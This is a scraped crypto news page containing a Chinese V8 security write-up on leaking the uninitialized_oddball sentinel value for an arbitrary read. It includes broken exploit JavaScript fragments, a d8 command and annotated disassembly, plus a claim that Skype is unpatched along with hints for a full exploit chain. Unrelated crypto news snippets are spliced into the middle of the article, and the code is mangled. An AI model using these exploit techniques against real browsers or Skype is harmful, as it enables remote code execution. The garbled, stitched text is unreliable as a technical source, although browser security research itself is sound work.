BTC/HKD+0.22%
ETH/HKD+0.23%
LTC/HKD+0.38%
DOT/HKD+0.65%
ADA/HKD-0.23%
SOL/HKD+0.41%
XRP/HKD+0.46%
DOGE/US+0.17%前言
Sentinelvalue(又名flagvalue/tripvalue/roguevalue/signalvalue/dummydata)是算法中的一個特殊值,通常在循環或遞歸算法中作為終止條件的特殊值存在。Chrome源碼中有很多Sentinelvalue。from-leaking-thehole-to-chrome-renderer-rce和TheHoleNewWorld-howasmallleakwillsinkagreatbrowser(CVE-2021-38003)中,都介紹了如何通過泄露TheHole對象實現CVE-2021-38003和CVE-2022–1364的沙箱內任意代碼執行。在我們發文闡述該緩解繞過大概一周后,谷歌團隊也迅速把這兩個在野CVE同步更新到了github上。時間節點如下:
{this</p>
<p> <b>fhi(f){this</b></p>
<p> flow(f){this</p>
<p> }functionUninitializedOddballExploiter(uninitialized_oddball){varh=newHelpers();letarr=newArray(0x1000000);arr=1</p>
<p> ;%PrepareFunctionForOptimization(read);read(exp2,0);%OptimizeFunctionOnNextCall(read);constold_space=0x200000;//0x200000letstart_offset=Math</p>
<p> Jump Trading面臨新的集體訴訟,指控其操控算法穩定幣UST:5月12日消息,Jump Trading 面臨新的集體訴訟,該公司被指控購買大量算法穩定幣 UST 以將其價值操縱至 1 美元,從而誤導投資者了解其真實價格和與代幣相關的風險,協助涉及 Terra 的欺詐計劃,根據集體訴訟,導致將資金投入相關加密貨幣的投資者損失至少 400 億美元。 </p>
<p> 訴訟稱,Jump Trading 是 Terraform Labs 的早期合作伙伴和財務支持者,TFL 向 Jump 借出了 3000 萬枚 LUNA 代幣,使他們能夠為 LUNA 和 UST 提供做市服務。作為回報,Jump 有權獲得賠償,其中包括以大幅折扣價獲得 LUNA 代幣。[2023/5/12 15:00:15]</p>
<p> }UninitializedOddballExploiter(%TheHole());//注意對%TheHole()做patch</p>
<p> 我們對上述代碼在v8-11.0.0中測試,當%TheHole()返回UninitializedOddball時,仍舊可以實現相對任意讀。</p>
<p> ./d8--expose-gc--allow-natives-syntax--print-opt-code--print-opt-code-filter=read--trace-turbo/home/avboy/Desktop/poc2.js</p>
<p> 對優化后的JavaScript的read函數去掉Prologue,留下關鍵反匯編如下所示:</p>
<p> 0x558b2000406929488b4d18REX.Wmovqrcx,0x558b2000406d2df6c101testbrcx,0x1;;checkifrcx(ie.obj,the1stargoffunction)is'Smi'0x558b20004070300f842e020000jz0x558b200042a4<+0x264>;;deoptreason'Smi'0x558b200040763641b831cd1900movlr8,0x19cd31;;(compressed)object:0x17140019cd31<Map(HOLEY_ELEMENTS)>0x558b2000407c3c443941ffcmpl,r8;;checkthemap(r8=0x19cd31isthemapofobj);;herewecheckthemapofobj,butwedidnotcheckthevalueofkey(ie.obj.prop);;andifwemakethevalueofkeytobeuninitialized_oddball,thereisthebypass0x558b20004080400f8522020000jnz0x558b200042a8<+0x268>;;deoptreason'wrongmap'0x558b2000408646448b410bmovlr8,;;*(addr(obj)+0xb)->r80x558b2000408a4a478b44060bmovlr8,;;r14ishighaddr0x558b2000408f4f4d03c6REX.Waddqr8,r14;;r8->inReadOnlySpace:#uninitialized0x558b2000409252458b4807movlr9,;;0x558b20004096564d03ceREX.Waddqr9,r14;;r9->0x2eb90000000d0x558b2000409959458b400bmovlr8,;;0x558b2000409d5d488b7d20REX.Wmovqrdi,;;rdiisindexofarr,the2ndargoffunction0x558b200040a16140f6c701testbrdi,0x1;;checkifrdiis'Smi'0x558b200040a5650f85da000000jnz0x558b20004185B5<+0x145>;;ifrdiisnot'Smi',JMP0x558b200040ab6b4c63dfREX.Wmovsxlqr11,rdi;;0x558b200040ae6e49d1fbREX.Wsarqr11,1;;r11/2,because'Smi'storedas'Smi'*2inMemory0x558b200040b1714d63c0REX.Wmovsxlqr8,r80x558b200040b47449d1f8REX.Wsarqr8,10x558b200040b7774d3bd8REX.Wcmpqr11,r8;;r11=0x40002,real_offsetastheindexofarr0x558b200040ba7a0f83ec010000jnc0x558b200042ac<+0x26c>;;deoptreason'outofbounds'0x558b200040c080c4817b1044d907vmovsdxmm0,;;movedoublefloatvaluetoxmm00x558b200040c787c5f92ec0vucomisdxmm0,xmm0;;ComparefloatvalueandSetEFLAGS0x558b200040cb8b0f8a88010000jpe0x558b20004259B9<+0x219>;;jpe(Jumpifparityeven)0x558b200040d1????91??0f8582010000?????????jnz?0x558b20004259??B9?<+0x219>??;;?jnz(Jump?if?not?zero)</p>
<p> 俄議員:與伊朗的統一數字貨幣或在年底前實施:金色財經報道,據俄羅斯衛星網報道,俄國家杜馬國際事務委員會主席列昂尼德?斯盧茨基表示,與伊朗的統一數字貨幣可能在年底前實施,這是有前景的方向。俄羅斯駐德黑蘭大使阿列克謝·德多夫2月早些時候表示,俄羅斯和伊朗正研究在進出口業務中使用數字貨幣的可能性。他指出,這一過程“處于工作階段”,需要專家認真研究,包括建立必要的法律法規框架。[2023/2/20 12:17:23]</p>
<p> 在0x558b2000407c處,檢查了read函數的obj,確定其prop屬性正確,但沒有檢查以obj.prop為key的Value,而是直接按照JavaScript語義計算偏移,求取數組的數值。如此導致我們在計算的時造成類型混淆,實現任意讀。</p>
<p> 如上匯編所示,當我們傳入uninitialized_oddball時,從0x558b20004086開始以obj為起點計算,最終在vmovsdxmm0,指令中完成任意讀,數據保存在xmm0寄存器中。類似TheHole對象,由于uninitialized_oddball在v8內存中排序靠前,且對象內容更加原始,偽造更加容易,在TheHole緩解繞過修復后,該方法不失為繞過首選。同理,任意寫我們可以參考Issue1352549進行構造分析。由于原理雷同,這里不再贅述。</p>
<p> 這里修復建議是,對優化后的函數返回數組元素時,添加對數組map的檢查,避免直接計算偏移返回數組數值。</p>
<p> PatchGapAlert</p>
<p> 在我們談論PatchGap時,實際上我們不僅僅需要關注曾經出現的歷史漏洞,我們還要關注廠商在基礎組件中悄悄修復的漏洞。對Issue1352549分析后,我們迅速排查了可能存在PatchGap的軟件,這里不得不指出,截至目前Skype仍舊沒有對該漏洞進行修復。在x86下任意讀寫會稍有不同。x64下由于存在地址壓縮,在tuborgfun優化javascript生成的代碼中,v8會默認將基址加上。x86由于沒有基址,因此任意讀寫是直接相對于整個進程的。如下匯編所示:</p>
<p> 1月份NFT交易量達9.46億美元,創2022年6月以來最高記錄:金色財經報道,據DappRadar數據,2023年1月NFT交易量和銷售額的激增,交易量達到9.46億美元,這是自2022年6月以來的最高交易量記錄。NFT的銷售數量也比上個月增加了42%,達到920萬。[2023/2/5 11:48:10]</p>
<p> 0x3979b8ff3f8b790bmovedi,0x3979b902428b7f0bmovedi,0x3979b905458b4707moveax,;;eaxwillbeafixednumber0x3979b908488b7f0bmovedi,0x3979b90b4b8b5510movedx,0x3979b90e4ef6c201test_bdl,0x10x3979b911510f85b6000000jnz0x3979b9cd<+0x10d>0x3979b9175789d6movesi,edx0x3979b91959d1fesaresi,1;;esiisindex0x3979b91b5bd1ffsaredi,1;;0x3734b73a0x3979b91d5d3bf7cmpesi,edi0x3979b91f5f0f838e010000jnc0x3979bab3<+0x1f3>;;deoptreason'outofbounds'0x3979b92565c5fb104cf007vmovsdxmm1,xmm0,;;</p>
<p> 如上所示,esi為任意讀數組的索引,eax為固定值,edi為)
GameStop瀏覽器錢包首席工程師Jeff Walsh已離職:金色財經報道,10月9日,GameStop瀏覽器錢包首席工程師Jeff Walsh表示已從該公司離職。Jeff Walsh于2021年6月加入GameStop。
此前報道,9月13日,GameStop的區塊鏈負責人Matt Finestone在社交媒體上宣布離職。[2022/10/9 12:50:18]
因此,在edi范圍內,可以任意讀寫。在具體做skype的exp時,雖然此時我們沒有地址壓縮帶來內存讀寫的便利,且skype開啟了aslr。但由于該文件太大,直接放在4GB內存中,黑客只需要對某個固定地址進行讀寫,便可以一個極大的概率讀寫skype文件中的內容。結合PE解析等傳統思路,不難完成整個漏洞利用鏈。基于此,我們無法保證黑客不能在短時間內完成整個利用鏈的適配。
這次PatchGap實際上不止需要排查Issue1352549,由于一個新的繞過方法的公開,直接導致了類似Issue1314616和Issue1216437的利用難度大幅度降低,黑客幾乎不需要花費任何研究成本,即可實現以往任何泄露uninitialized_oddball漏洞的完整利用,包括谷歌clusterfuzz提交的所有Issue中類似的漏洞。
總結
本文僅拋磚引玉,粗略來談通過泄露Sentinelvalue中的uninitialized_Oddball來實現任意讀原語。如第二部分所示,v8中的Sentinelvalue還有很多,實際上我們在測試Sentinelvalue的時候,也會經常容易遇到崩潰,不乏有非int3的崩潰出現。由于Uninitialized_Oddball和TheHole均已被證明可以在v8中實現環節繞過,我們有充分的理由懷疑其他Sentinelvalue也可能導致類似問題。
以太坊核心開發人員:尚未確定上海升級的具體內容:金色財經報道,以太坊核心開發人員Marius Van Der Wijden表示,核心開發人員可能會同意在接下來的“上海”升級中解決質押ETH提款問題,但是本次升級的具體內容目前仍不清楚。如果“上海”升級內容過多,可能會影響測試進度,比如‘上海’升級中有10項變化,那么就需要對每個變化進行單獨測試,而且還需要測試不同變化之間如何相互作用、相互影響,這意味著一旦‘上海’升級中包含的功能數量增多,測試工作量將會呈指數級增長,最終導致“上海”升級日期延遲。由于“上海”升級將解決質押ETH提款問題,一旦延遲,可能會影響質押者和驗證者利益。[2022/9/16 7:00:27]
這也給我們一點提示:
01-其他uninitialized_Oddball泄露是否會輕松實現v8的RCE;
02-我們已經看到,谷歌會迅速將TheHole繞過進行修復,我們也看到利用垃圾回收實現ASLR繞過被長期擱置。這說明類似issue仍處在一個模糊邊界,即是否被正式當作安全問題對待。
03-如果02中的問題被當作正式安全問題對待,那么在fuzzer中是否有必要考慮將%TheHole/uninitialized_Oddball等Sentinelvalue作為變量加入,來挖掘其他利用原語;
這里不得不強調的是,無論該類問題是否被正式當作安全問題對待,它都會大大縮減黑客實現完整利用周期。
參考資料
https://bugs.chromium.org/p/chromium/issues/detail?id=1314616
https://bugs.chromium.org/p/chromium/issues/detail?id=1352549
https://bugs.chromium.org/p/chromium/issues/detail?id=1216437
https://starlabs.sg/blog/2022/12-the-hole-new-world-how-a-small-leak-will-sink-a-great-browser-cve-2021-38003/
無論在傳統金融市場還是加密市場,流動性是所有交易市場的生命線,而做市商便在其中起著舉足輕重的作用.
1900/1/1 0:00:001月10日,由MarsBit主辦,香港創新產業園區數碼港、G-Rocket高諾國際加速器、element協辦的「POW’ER香港Web3創新者峰會」在港舉辦.
1900/1/1 0:00:00近期,7upDAO邀請了MaskNetworkFounder@suji_yan、NothingResearchPartner@0x_Todd、SkySagaCapitalFoundingPart.
1900/1/1 0:00:00圖片來源:由無界版圖AI繪畫工具生成12月16日,《阿凡達:水之道》在全國的IMAX影院公映。這是被譽為“卡神”的詹姆斯·卡梅隆的最新力作.
1900/1/1 0:00:00最近,加密貨幣世界出現了很多FUD。其中一些是合理的。有些則并不。其中一些更是令人真正的感到困惑.
1900/1/1 0:00:00為什么贈款很重要? 贈款和贈款計劃在加密領域或Web3中一直占有一席之地。這些贈款計劃最初側重于基礎層網絡基礎設施、軟件開發和開發人員工具。如今,已經涉及到多個領域.
1900/1/1 0:00:00
比特幣交易所
